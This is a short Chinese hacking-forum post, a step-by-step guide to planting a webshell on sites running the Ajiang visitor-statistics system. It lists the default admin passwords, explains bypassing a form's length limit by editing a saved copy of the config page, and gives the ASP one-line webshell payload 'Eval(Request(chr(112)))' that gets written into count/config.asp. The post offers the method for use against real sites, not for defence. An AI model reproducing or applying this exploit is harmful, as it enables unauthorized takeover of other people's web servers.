因是大约一个月钱在刀客的群里 看到刀客大牛用这个统计系统拿下了一个SHELL 那个时候我没怎么注意 因为平时碰到这样的站很少 也就没听大牛们的详细思路了!
无奈到了自己这里今天下午又碰到个一样的站 纠结···
不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)
此后台默认的账号密码是 admin admin , ITlearner ITlearner
先进后台
来到修改配置界面 保存源文件到本地
本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100 下边是修改后的截图
然后在本地文件修改action地址 例如IE 中的提交地址是http://www.f4sh.com/count/admin.asp?action=ShowConfig
那么我们就修改为 action="http://www.f4sh.com/count/admin.asp?Action=SaveConfig"
下边是修改后的截图
然后保存文件 用IE 打开 在网站访问量地址后写入 0:Eval(Request(chr(112)))
这个一句话的密码是P 点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了
只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···